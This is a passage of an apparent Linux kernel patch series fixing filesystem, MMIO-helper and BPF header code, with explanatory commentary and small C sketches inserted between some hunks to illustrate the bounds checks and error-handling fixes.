+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+ 		return 0;
+@@ -4914,6 +4926,9 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 	int rc = 0, len;
+ 	int fs_infoclass_size = 0;
+ 
++	if (!share->path)
++		return -EIO;
++
+ 	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
+ 	if (rc) {
+ 		pr_err("cannot create vfs path\n");
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 2a0ca5c7f082a..660ccfaf463e4 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -67,6 +67,8 @@
+ 
+ #define OPENOWNER_POOL_SIZE	8
+ 
++static void nfs4_state_start_reclaim_reboot(struct nfs_client *clp);
++
+ const nfs4_stateid zero_stateid = {
+ 	{ .data = { 0 } },
+ 	.type = NFS4_SPECIAL_STATEID_TYPE,
+@@ -330,6 +332,8 @@ do_confirm:
+ 	status = nfs4_proc_create_session(clp, cred);
+ 	if (status != 0)
+ 		goto out;
++	if (!(clp->cl_exchange_flags & EXCHGID4_FLAG_CONFIRMED_R))
++		nfs4_state_start_reclaim_reboot(clp);
+ 	nfs41_finish_session_reset(clp);
+ 	nfs_mark_client_ready(clp, NFS_CS_READY);
+ out:
+diff --git a/fs/nilfs2/bmap.c b/fs/nilfs2/bmap.c
+index 798a2c1b38c6c..7a8f166f2c8d8 100644
+--- a/fs/nilfs2/bmap.c
++++ b/fs/nilfs2/bmap.c
+@@ -67,20 +67,28 @@ int nilfs_bmap_lookup_at_level(struct nilfs_bmap *bmap, __u64 key, int level,
+ 
+ 	down_read(&bmap->b_sem);
+ 	ret = bmap->b_ops->bop_lookup(bmap, key, level, ptrp);
+-	if (ret < 0) {
+-		ret = nilfs_bmap_convert_error(bmap, __func__, ret);
++	if (ret < 0)
+ 		goto out;
+-	}
++
+ 	if (NILFS_BMAP_USE_VBN(bmap)) {
+ 		ret = nilfs_dat_translate(nilfs_bmap_get_dat(bmap), *ptrp,
+ 					  &blocknr);
+ 		if (!ret)
+ 			*ptrp = blocknr;
++		else if (ret == -ENOENT) {
++			/*
++			 * If there was no valid entry in DAT for the block
++			 * address obtained by b_ops->bop_lookup, then pass
++			 * internal code -EINVAL to nilfs_bmap_convert_error
++			 * to treat it as metadata corruption.
++			 */
++			ret = -EINVAL;
++		}
+ 	}
+ 
+  out:
+ 	up_read(&bmap->b_sem);
+-	return ret;
++	return nilfs_bmap_convert_error(bmap, __func__, ret);
+ }
+ 
+ int nilfs_bmap_lookup_contig(struct nilfs_bmap *bmap, __u64 key, __u64 *ptrp,
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 5b15746055927..e26eb45c446f2 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2039,6 +2039,9 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 	struct the_nilfs *nilfs = sci->sc_super->s_fs_info;
+ 	int err;
+ 
++	if (sb_rdonly(sci->sc_super))
++		return -EROFS;
++
+ 	nilfs_sc_cstage_set(sci, NILFS_ST_INIT);
+ 	sci->sc_cno = nilfs->ns_cno;
+ 
+@@ -2722,7 +2725,7 @@ static void nilfs_segctor_write_out(struct nilfs_sc_info *sci)
+ 
+ 		flush_work(&sci->sc_iput_work);
+ 
+-	} while (ret && retrycount-- > 0);
++	} while (ret && ret != -EROFS && retrycount-- > 0);
+ }
+ 
+ /**
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index c6eb371a36951..bf73964472845 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2575,7 +2575,7 @@ static int read_next_log_rec(struct ntfs_log *log, struct lcb *lcb, u64 *lsn)
+ 	return find_log_rec(log, *lsn, lcb);
+ }
+ 
+-static inline bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
+ {
+ 	__le16 mask;
+ 	u32 min_de, de_off, used, total;
+@@ -4256,6 +4256,10 @@ check_attribute_names:
+ 	rec_len -= t32;
+ 
+ 	attr_names = kmemdup(Add2Ptr(lrh, t32), rec_len, GFP_NOFS);
++	if (!attr_names) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	lcb_put(lcb);
+ 	lcb = NULL;
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 51ab759546403..7a1e01a2ed9ae 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -725,9 +725,13 @@ static struct NTFS_DE *hdr_find_e(const struct ntfs_index *indx,
+ 	u32 e_size, e_key_len;
+ 	u32 end = le32_to_cpu(hdr->used);
+ 	u32 off = le32_to_cpu(hdr->de_off);
++	u32 total = le32_to_cpu(hdr->total);
+ 	u16 offs[128];
+ 
+ fill_table:
++	if (end > total)
++		return NULL;
++
+ 	if (off + sizeof(struct NTFS_DE) > end)
+ 		return NULL;
+ 
+@@ -844,6 +848,10 @@ static inline struct NTFS_DE *hdr_delete_de(struct INDEX_HDR *hdr,
+ 	u32 off = PtrOffset(hdr, re);
+ 	int bytes = used - (off + esize);
+ 
++	/* Check that the INDEX_HDR is valid before using it. */
++	if (!check_index_header(hdr, le32_to_cpu(hdr->total)))
++		return NULL;
++
+ 	if (off >= used || esize < sizeof(struct NTFS_DE) ||
+ 	    bytes < sizeof(struct NTFS_DE))
+ 		return NULL;
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 20b953871574b..33494a67bf063 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -259,7 +259,6 @@ next_attr:
+ 			goto out;
+ 
+ 		root = Add2Ptr(attr, roff);
+-		is_root = true;
+ 
+ 		if (attr->name_len != ARRAY_SIZE(I30_NAME) ||
+ 		    memcmp(attr_name(attr), I30_NAME, sizeof(I30_NAME)))
+@@ -272,6 +271,7 @@ next_attr:
+ 		if (!is_dir)
+ 			goto next_attr;
+ 
++		is_root = true;
+ 		ni->ni_flags |= NI_FLAG_DIR;
+ 
+ 		err = indx_init(&ni->dir, sbi, attr, INDEX_MUTEX_I30);
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 0e051c5595a21..2050eb3f6a5a6 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -579,6 +579,7 @@ int ni_rename(struct ntfs_inode *dir_ni, struct ntfs_inode *new_dir_ni,
+ bool ni_is_dirty(struct inode *inode);
+ 
+ /* Globals from fslog.c */
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes);
+ int log_replay(struct ntfs_inode *ni, bool *initialized);
+ 
+ /* Globals from fsntfs.c */
+diff --git a/fs/pstore/pmsg.c b/fs/pstore/pmsg.c
+index ab82e5f053464..b31c9c72d90b4 100644
+--- a/fs/pstore/pmsg.c
++++ b/fs/pstore/pmsg.c
+@@ -7,10 +7,9 @@
+ #include <linux/device.h>
+ #include <linux/fs.h>
+ #include <linux/uaccess.h>
+-#include <linux/rtmutex.h>
+ #include "internal.h"
+ 
+-static DEFINE_RT_MUTEX(pmsg_lock);
++static DEFINE_MUTEX(pmsg_lock);
+ 
+ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 			  size_t count, loff_t *ppos)
+@@ -29,9 +28,9 @@ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 	if (!access_ok(buf, count))
+ 		return -EFAULT;
+ 
+-	rt_mutex_lock(&pmsg_lock);
++	mutex_lock(&pmsg_lock);
+ 	ret = psinfo->write_user(&record, buf);
+-	rt_mutex_unlock(&pmsg_lock);
++	mutex_unlock(&pmsg_lock);
+ 	return ret ? ret : count;
+ }
+ 
+diff --git a/fs/reiserfs/xattr_security.c b/fs/reiserfs/xattr_security.c
+index 857a65b057264..157ebfe2456bb 100644
+--- a/fs/reiserfs/xattr_security.c
++++ b/fs/reiserfs/xattr_security.c
+@@ -82,11 +82,15 @@ int reiserfs_security_write(struct reiserfs_transaction_handle *th,
+ 			    struct inode *inode,
+ 			    struct reiserfs_security_handle *sec)
+ {
++	char xattr_name[XATTR_NAME_MAX + 1] = XATTR_SECURITY_PREFIX;
+ 	int error;
+-	if (strlen(sec->name) < sizeof(XATTR_SECURITY_PREFIX))
++
++	if (XATTR_SECURITY_PREFIX_LEN + strlen(sec->name) > XATTR_NAME_MAX)
+ 		return -EINVAL;
+ 
+-	error = reiserfs_xattr_set_handle(th, inode, sec->name, sec->value,
++	strlcat(xattr_name, sec->name, sizeof(xattr_name));
++
++	error = reiserfs_xattr_set_handle(th, inode, xattr_name, sec->value,
+ 					  sec->length, XATTR_CREATE);
+ 	if (error == -ENODATA || error == -EOPNOTSUPP)
+ 		error = 0;
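
The fix above stops trusting sec->name to already carry the "security."
prefix: it builds the full attribute name in a bounded buffer and rejects
names that would exceed XATTR_NAME_MAX. A standalone sketch of the same
bounded concatenation, with snprintf in place of the kernel's strlcat
(constants reproduced here for illustration):

#include <stdio.h>
#include <string.h>

#define XATTR_NAME_MAX		255
#define XATTR_SECURITY_PREFIX	"security."
#define XATTR_SECURITY_PREFIX_LEN (sizeof(XATTR_SECURITY_PREFIX) - 1)

/* Fills name[] on success; returns -22 (-EINVAL) if the result would
 * not fit, which is exactly the check the patch adds. */
static int build_xattr_name(char name[XATTR_NAME_MAX + 1], const char *suffix)
{
	if (XATTR_SECURITY_PREFIX_LEN + strlen(suffix) > XATTR_NAME_MAX)
		return -22;

	snprintf(name, XATTR_NAME_MAX + 1, "%s%s",
		 XATTR_SECURITY_PREFIX, suffix);
	return 0;
}

int main(void)
{
	char name[XATTR_NAME_MAX + 1];

	if (!build_xattr_name(name, "selinux"))
		puts(name);	/* prints "security.selinux" */
	return 0;
}
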
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 5e6bcce94e641..66ba57a139d2a 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -358,7 +358,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	umode_t mode = S_IFCHR | WHITEOUT_MODE;
+ 	struct inode *inode;
+ 	struct ubifs_info *c = dir->i_sb->s_fs_info;
+-	struct fscrypt_name nm;
+ 
+ 	/*
+ 	 * Create an inode('nlink = 1') for whiteout without updating journal,
+@@ -369,10 +368,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	dbg_gen("dent '%pd', mode %#hx in dir ino %lu",
+ 		dentry, mode, dir->i_ino);
+ 
+-	err = fscrypt_setup_filename(dir, &dentry->d_name, 0, &nm);
+-	if (err)
+-		return ERR_PTR(err);
+-
+ 	inode = ubifs_new_inode(c, dir, mode, false);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+@@ -395,7 +390,6 @@ out_inode:
+ 	make_bad_inode(inode);
+ 	iput(inode);
+ out_free:
+-	fscrypt_free_filename(&nm);
+ 	ubifs_err(c, "cannot create whiteout file, error %d", err);
+ 	return ERR_PTR(err);
+ }
+@@ -492,6 +486,7 @@ static int ubifs_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	unlock_2_inodes(dir, inode);
+ 
+ 	ubifs_release_budget(c, &req);
++	fscrypt_free_filename(&nm);
+ 
+ 	return finish_open_simple(file, 0);
+ 
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 2469f72eeaabb..6b7d95b65f4b6 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -44,6 +44,33 @@ enum {
+ 	NOT_ON_MEDIA = 3,
+ };
+ 
++static void do_insert_old_idx(struct ubifs_info *c,
++			      struct ubifs_old_idx *old_idx)
++{
++	struct ubifs_old_idx *o;
++	struct rb_node **p, *parent = NULL;
++
++	p = &c->old_idx.rb_node;
++	while (*p) {
++		parent = *p;
++		o = rb_entry(parent, struct ubifs_old_idx, rb);
++		if (old_idx->lnum < o->lnum)
++			p = &(*p)->rb_left;
++		else if (old_idx->lnum > o->lnum)
++			p = &(*p)->rb_right;
++		else if (old_idx->offs < o->offs)
++			p = &(*p)->rb_left;
++		else if (old_idx->offs > o->offs)
++			p = &(*p)->rb_right;
++		else {
++			ubifs_err(c, "old idx added twice!");
++			kfree(old_idx);
++		}
++	}
++	rb_link_node(&old_idx->rb, parent, p);
++	rb_insert_color(&old_idx->rb, &c->old_idx);
++}
++
+ /**
+  * insert_old_idx - record an index node obsoleted since the last commit start.
+  * @c: UBIFS file-system description object
+@@ -69,35 +96,15 @@ enum {
+  */
+ static int insert_old_idx(struct ubifs_info *c, int lnum, int offs)
+ {
+-	struct ubifs_old_idx *old_idx, *o;
+-	struct rb_node **p, *parent = NULL;
++	struct ubifs_old_idx *old_idx;
+ 
+ 	old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
+ 	if (unlikely(!old_idx))
+ 		return -ENOMEM;
+ 	old_idx->lnum = lnum;
+ 	old_idx->offs = offs;
++	do_insert_old_idx(c, old_idx);
+ 
+-	p = &c->old_idx.rb_node;
+-	while (*p) {
+-		parent = *p;
+-		o = rb_entry(parent, struct ubifs_old_idx, rb);
+-		if (lnum < o->lnum)
+-			p = &(*p)->rb_left;
+-		else if (lnum > o->lnum)
+-			p = &(*p)->rb_right;
+-		else if (offs < o->offs)
+-			p = &(*p)->rb_left;
+-		else if (offs > o->offs)
+-			p = &(*p)->rb_right;
+-		else {
+-			ubifs_err(c, "old idx added twice!");
+-			kfree(old_idx);
+-			return 0;
+-		}
+-	}
+-	rb_link_node(&old_idx->rb, parent, p);
+-	rb_insert_color(&old_idx->rb, &c->old_idx);
+ 	return 0;
+ }
+ 
+@@ -199,23 +206,6 @@ static struct ubifs_znode *copy_znode(struct ubifs_info *c,
+ 	__set_bit(DIRTY_ZNODE, &zn->flags);
+ 	__clear_bit(COW_ZNODE, &zn->flags);
+ 
+-	ubifs_assert(c, !ubifs_zn_obsolete(znode));
+-	__set_bit(OBSOLETE_ZNODE, &znode->flags);
+-
+-	if (znode->level != 0) {
+-		int i;
+-		const int n = zn->child_cnt;
+-
+-		/* The children now have new parent */
+-		for (i = 0; i < n; i++) {
+-			struct ubifs_zbranch *zbr = &zn->zbranch[i];
+-
+-			if (zbr->znode)
+-				zbr->znode->parent = zn;
+-		}
+-	}
+-
+-	atomic_long_inc(&c->dirty_zn_cnt);
+ 	return zn;
+ }
+ 
+@@ -233,6 +223,42 @@ static int add_idx_dirt(struct ubifs_info *c, int lnum, int dirt)
+ 	return ubifs_add_dirt(c, lnum, dirt);
+ }
+ 
++/**
++ * replace_znode - replace old znode with new znode.
++ * @c: UBIFS file-system description object
++ * @new_zn: new znode
++ * @old_zn: old znode
++ * @zbr: the branch of parent znode
++ *
++ * Replace old znode with new znode in TNC.
++ */
++static void replace_znode(struct ubifs_info *c, struct ubifs_znode *new_zn,
++			  struct ubifs_znode *old_zn, struct ubifs_zbranch *zbr)
++{
++	ubifs_assert(c, !ubifs_zn_obsolete(old_zn));
++	__set_bit(OBSOLETE_ZNODE, &old_zn->flags);
++
++	if (old_zn->level != 0) {
++		int i;
++		const int n = new_zn->child_cnt;
++
++		/* The children now have new parent */
++		for (i = 0; i < n; i++) {
++			struct ubifs_zbranch *child = &new_zn->zbranch[i];
++
++			if (child->znode)
++				child->znode->parent = new_zn;
++		}
++	}
++
++	zbr->znode = new_zn;
++	zbr->lnum = 0;
++	zbr->offs = 0;
++	zbr->len = 0;
++
++	atomic_long_inc(&c->dirty_zn_cnt);
++}
++
+ /**
+  * dirty_cow_znode - ensure a znode is not being committed.
+  * @c: UBIFS file-system description object
+@@ -265,28 +291,32 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 		return zn;
+ 
+ 	if (zbr->len) {
+-		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+-		if (unlikely(err))
+-			/*
+-			 * Obsolete znodes will be freed by tnc_destroy_cnext()
+-			 * or free_obsolete_znodes(), copied up znodes should
+-			 * be added back to tnc and freed by
+-			 * ubifs_destroy_tnc_subtree().
+-			 */
++		struct ubifs_old_idx *old_idx;
++
++		old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
++		if (unlikely(!old_idx)) {
++			err = -ENOMEM;
+ 			goto out;
++		}
++		old_idx->lnum = zbr->lnum;
++		old_idx->offs = zbr->offs;
++
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+-	} else
+-		err = 0;
++		if (err) {
++			kfree(old_idx);
++			goto out;
++		}
+ 
+-out:
+-	zbr->znode = zn;
+-	zbr->lnum = 0;
+-	zbr->offs = 0;
+-	zbr->len = 0;
++		do_insert_old_idx(c, old_idx);
++	}
++
++	replace_znode(c, zn, znode, zbr);
+ 
+-	if (unlikely(err))
+-		return ERR_PTR(err);
+ 	return zn;
++
++out:
++	kfree(zn);
++	return ERR_PTR(err);
+ }
+ 
+ /**
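
The dirty_cow_znode() rework follows a preallocate-then-commit
discipline: the old_idx node is allocated and add_idx_dirt() run before
the TNC is touched, so every failure path can simply free the new znode
and leave the tree unchanged, where the old code published a half-updated
zbranch on error. The idea in miniature (illustrative list code, no
relation to the real UBIFS structures):

#include <stdlib.h>

struct node {
	int val;
	struct node *next;
};

/* Insert val at the head of *list, but only after everything that can
 * fail has succeeded: on error the list is provably untouched. */
static int insert_copy(struct node **list, int val)
{
	struct node *n = malloc(sizeof(*n));	/* 1. acquire resources */

	if (!n)
		return -12;	/* -ENOMEM; *list not modified */

	n->val = val;		/* 2. prepare privately */

	n->next = *list;	/* 3. publish in one step */
	*list = n;
	return 0;
}

int main(void)
{
	struct node *list = NULL;

	return insert_copy(&list, 42) ? 1 : 0;
}
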
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index 1eeecf2eb2a77..28c464307817d 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -72,7 +72,8 @@ xfs_sb_validate_v5_features(
+ }
+ 
+ /*
+- * We support all XFS versions newer than a v4 superblock with V2 directories.
++ * We currently support XFS v5 formats with known features and v4 superblocks with
++ * at least V2 directories.
+  */
+ bool
+ xfs_sb_good_version(
+@@ -86,16 +87,16 @@ xfs_sb_good_version(
+ 	if (xfs_sb_is_v5(sbp))
+ 		return xfs_sb_validate_v5_features(sbp);
+ 
++	/* versions prior to v4 are not supported */
++	if (XFS_SB_VERSION_NUM(sbp) != XFS_SB_VERSION_4)
++		return false;
++
+ 	/* We must not have any unknown v4 feature bits set */
+ 	if ((sbp->sb_versionnum & ~XFS_SB_VERSION_OKBITS) ||
+ 	    ((sbp->sb_versionnum & XFS_SB_VERSION_MOREBITSBIT) &&
+ 	     (sbp->sb_features2 & ~XFS_SB_VERSION2_OKBITS)))
+ 		return false;
+ 
+-	/* versions prior to v4 are not supported */
+-	if (XFS_SB_VERSION_NUM(sbp) < XFS_SB_VERSION_4)
+-		return false;
+-
+ 	/* V4 filesystems need v2 directories and unwritten extents */
+ 	if (!(sbp->sb_versionnum & XFS_SB_VERSION_DIRV2BIT))
+ 		return false;
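
Hoisting the "!= XFS_SB_VERSION_4" test ahead of the feature-bit checks
matters because sb_versionnum packs a version number and feature flags
into one word; the flag bits of an unknown version mean nothing. A tiny
validator in the same spirit (the field layout and constants below are
invented for illustration, not the real XFS on-disk format):

#include <stdbool.h>
#include <stdint.h>

#define VERSION_MASK	0x000f	/* low nibble: version number */
#define KNOWN_FEATURES	0x0ff0	/* feature bits we understand */
#define SUPPORTED_VER	4

static bool sb_good_version(uint16_t versionnum)
{
	/* Decide what the word is before asking what it says. */
	if ((versionnum & VERSION_MASK) != SUPPORTED_VER)
		return false;

	/* Only now is rejecting unknown feature bits meaningful. */
	if (versionnum & ~(VERSION_MASK | KNOWN_FEATURES))
		return false;

	return true;
}

int main(void)
{
	return sb_good_version(0x0014) ? 0 : 1;
}
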
+diff --git a/include/asm-generic/io.h b/include/asm-generic/io.h
+index 4c44a29b5e8ef..587e7e9b9a375 100644
+--- a/include/asm-generic/io.h
++++ b/include/asm-generic/io.h
+@@ -236,7 +236,7 @@ static inline u64 readq(const volatile void __iomem *addr)
+ 
+ 	log_read_mmio(64, addr, _THIS_IP_, _RET_IP_);
+ 	__io_br();
+-	val = __le64_to_cpu(__raw_readq(addr));
++	val = __le64_to_cpu((__le64 __force)__raw_readq(addr));
+ 	__io_ar(val);
+ 	log_post_read_mmio(val, 64, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+@@ -287,7 +287,7 @@ static inline void writeq(u64 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+ 	__io_bw();
+-	__raw_writeq(__cpu_to_le64(value), addr);
++	__raw_writeq((u64 __force)__cpu_to_le64(value), addr);
+ 	__io_aw();
+ 	log_post_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+ }
+@@ -319,7 +319,7 @@ static inline u16 readw_relaxed(const volatile void __iomem *addr)
+ 	u16 val;
+ 
+ 	log_read_mmio(16, addr, _THIS_IP_, _RET_IP_);
+-	val = __le16_to_cpu(__raw_readw(addr));
++	val = __le16_to_cpu((__le16 __force)__raw_readw(addr));
+ 	log_post_read_mmio(val, 16, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+ }
+@@ -332,7 +332,7 @@ static inline u32 readl_relaxed(const volatile void __iomem *addr)
+ 	u32 val;
+ 
+ 	log_read_mmio(32, addr, _THIS_IP_, _RET_IP_);
+-	val = __le32_to_cpu(__raw_readl(addr));
++	val = __le32_to_cpu((__le32 __force)__raw_readl(addr));
+ 	log_post_read_mmio(val, 32, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+ }
+@@ -345,7 +345,7 @@ static inline u64 readq_relaxed(const volatile void __iomem *addr)
+ 	u64 val;
+ 
+ 	log_read_mmio(64, addr, _THIS_IP_, _RET_IP_);
+-	val = __le64_to_cpu(__raw_readq(addr));
++	val = __le64_to_cpu((__le64 __force)__raw_readq(addr));
+ 	log_post_read_mmio(val, 64, addr, _THIS_IP_, _RET_IP_);
+ 	return val;
+ }
+@@ -366,7 +366,7 @@ static inline void writeb_relaxed(u8 value, volatile void __iomem *addr)
+ static inline void writew_relaxed(u16 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 16, addr, _THIS_IP_, _RET_IP_);
+-	__raw_writew(cpu_to_le16(value), addr);
++	__raw_writew((u16 __force)cpu_to_le16(value), addr);
+ 	log_post_write_mmio(value, 16, addr, _THIS_IP_, _RET_IP_);
+ }
+ #endif
+@@ -376,7 +376,7 @@ static inline void writew_relaxed(u16 value, volatile void __iomem *addr)
+ static inline void writel_relaxed(u32 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 32, addr, _THIS_IP_, _RET_IP_);
+-	__raw_writel(__cpu_to_le32(value), addr);
++	__raw_writel((u32 __force)__cpu_to_le32(value), addr);
+ 	log_post_write_mmio(value, 32, addr, _THIS_IP_, _RET_IP_);
+ }
+ #endif
+@@ -386,7 +386,7 @@ static inline void writel_relaxed(u32 value, volatile void __iomem *addr)
+ static inline void writeq_relaxed(u64 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+-	__raw_writeq(__cpu_to_le64(value), addr);
++	__raw_writeq((u64 __force)__cpu_to_le64(value), addr);
+ 	log_post_write_mmio(value, 64, addr, _THIS_IP_, _RET_IP_);
+ }
+ #endif
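
The __force casts above are for sparse, not the compiler: __raw_readl()
returns a plain u32 while __le32_to_cpu() expects a __le32, and the cast
tells sparse that the reinterpretation is deliberate. The conversion
itself is just a conditional byte swap; a portable userspace version of
le32-to-cpu that assumes nothing about the host (the helper name is made
up):

#include <stdint.h>
#include <stdio.h>

/* Assemble the value from explicit byte positions, so the result is
 * correct on little- and big-endian hosts alike, with no #ifdefs. */
static uint32_t le32_to_cpu_portable(const uint8_t b[4])
{
	return (uint32_t)b[0]
	     | (uint32_t)b[1] << 8
	     | (uint32_t)b[2] << 16
	     | (uint32_t)b[3] << 24;
}

int main(void)
{
	uint8_t raw[4] = { 0x78, 0x56, 0x34, 0x12 };	/* LE 0x12345678 */

	printf("0x%08x\n", le32_to_cpu_portable(raw));
	return 0;
}
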
+diff --git a/include/drm/drm_file.h b/include/drm/drm_file.h
+index 0d1f853092ab8..ecffe24e2b1b0 100644
+--- a/include/drm/drm_file.h
++++ b/include/drm/drm_file.h
+@@ -408,7 +408,8 @@ static inline bool drm_is_render_client(const struct drm_file *file_priv)
+  * Returns true if this is an open file of the compute acceleration node, i.e.
+  * &drm_file.minor of @file_priv is a accel minor.
+  *
+- * See also the :ref:`section on accel nodes <drm_accel_node>`.
++ * See also :doc:`Introduction to compute accelerators subsystem
++ * </accel/introduction>`.
+  */
+ static inline bool drm_is_accel_client(const struct drm_file *file_priv)
+ {
+diff --git a/include/drm/i915_pciids.h b/include/drm/i915_pciids.h
+index 4a4c190f76984..8f648c32a9657 100644
+--- a/include/drm/i915_pciids.h
++++ b/include/drm/i915_pciids.h
+@@ -706,7 +706,6 @@
+ 	INTEL_VGA_DEVICE(0x5693, info), \
+ 	INTEL_VGA_DEVICE(0x5694, info), \
+ 	INTEL_VGA_DEVICE(0x5695, info), \
+-	INTEL_VGA_DEVICE(0x5698, info), \
+ 	INTEL_VGA_DEVICE(0x56A5, info), \
+ 	INTEL_VGA_DEVICE(0x56A6, info), \
+ 	INTEL_VGA_DEVICE(0x56B0, info), \
+diff --git a/include/linux/blk-crypto.h b/include/linux/blk-crypto.h
+index 1e3e5d0adf120..5e5822c18ee41 100644
+--- a/include/linux/blk-crypto.h
++++ b/include/linux/blk-crypto.h
+@@ -95,8 +95,8 @@ int blk_crypto_init_key(struct blk_crypto_key *blk_key, const u8 *raw_key,
+ int blk_crypto_start_using_key(struct block_device *bdev,
+ 			       const struct blk_crypto_key *key);
+ 
+-int blk_crypto_evict_key(struct block_device *bdev,
+-			 const struct blk_crypto_key *key);
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key);
+ 
+ bool blk_crypto_config_supported_natively(struct block_device *bdev,
+ 					  const struct blk_crypto_config *cfg);
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index cf0d88109e3f9..1c88f6761eea3 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -95,11 +95,11 @@ struct bpf_map_ops {
+ 
+ 	/* funcs callable from userspace and from eBPF programs */
+ 	void *(*map_lookup_elem)(struct bpf_map *map, void *key);
+-	int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
+-	int (*map_delete_elem)(struct bpf_map *map, void *key);
+-	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
+-	int (*map_pop_elem)(struct bpf_map *map, void *value);
+-	int (*map_peek_elem)(struct bpf_map *map, void *value);
++	long (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
++	long (*map_delete_elem)(struct bpf_map *map, void *key);
++	long (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
++	long (*map_pop_elem)(struct bpf_map *map, void *value);
++	long (*map_peek_elem)(struct bpf_map *map, void *value);
+ 	void *(*map_lookup_percpu_elem)(struct bpf_map *map, void *key, u32 cpu);
+ 
+ 	/* funcs called by prog_array and perf_event_array map */
+@@ -138,7 +138,7 @@ struct bpf_map_ops {
+ 	struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);
+ 
+ 	/* Misc helpers.*/
+-	int (*map_redirect)(struct bpf_map *map, u64 key, u64 flags);
++	long (*map_redirect)(struct bpf_map *map, u64 key, u64 flags);
+ 
+ 	/* map_meta_equal must be implemented for maps that can be
+ 	 * used as an inner map.  It is a runtime check to ensure
+@@ -156,7 +156,7 @@ struct bpf_map_ops {
+ 	int (*map_set_for_each_callback_args)(struct bpf_verifier_env *env,
+ 					      struct bpf_func_state *caller,
+ 					      struct bpf_func_state *callee);
+-	int (*map_for_each_callback)(struct bpf_map *map,
++	long (*map_for_each_callback)(struct bpf_map *map,
+ 				     bpf_callback_t callback_fn,
+ 				     void *callback_ctx, u64 flags);
+ 
+@@ -180,6 +180,10 @@ enum btf_field_type {
+ 	BPF_KPTR       = BPF_KPTR_UNREF | BPF_KPTR_REF,
+ 	BPF_LIST_HEAD  = (1 << 4),
+ 	BPF_LIST_NODE  = (1 << 5),
++	BPF_RB_ROOT    = (1 << 6),
++	BPF_RB_NODE    = (1 << 7),
++	BPF_GRAPH_NODE_OR_ROOT = BPF_LIST_NODE | BPF_LIST_HEAD |
++				 BPF_RB_NODE | BPF_RB_ROOT,
+ };
+ 
+ struct btf_field_kptr {
+@@ -189,7 +193,7 @@ struct btf_field_kptr {
+ 	u32 btf_id;
+ };
+ 
+-struct btf_field_list_head {
++struct btf_field_graph_root {
+ 	struct btf *btf;
+ 	u32 value_btf_id;
+ 	u32 node_offset;
+@@ -201,7 +205,7 @@ struct btf_field {
+ 	enum btf_field_type type;
+ 	union {
+ 		struct btf_field_kptr kptr;
+-		struct btf_field_list_head list_head;
++		struct btf_field_graph_root graph_root;
+ 	};
+ };
+ 
+@@ -283,6 +287,10 @@ static inline const char *btf_field_type_name(enum btf_field_type type)
+ 		return "bpf_list_head";
+ 	case BPF_LIST_NODE:
+ 		return "bpf_list_node";
++	case BPF_RB_ROOT:
++		return "bpf_rb_root";
++	case BPF_RB_NODE:
++		return "bpf_rb_node";
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 		return "unknown";
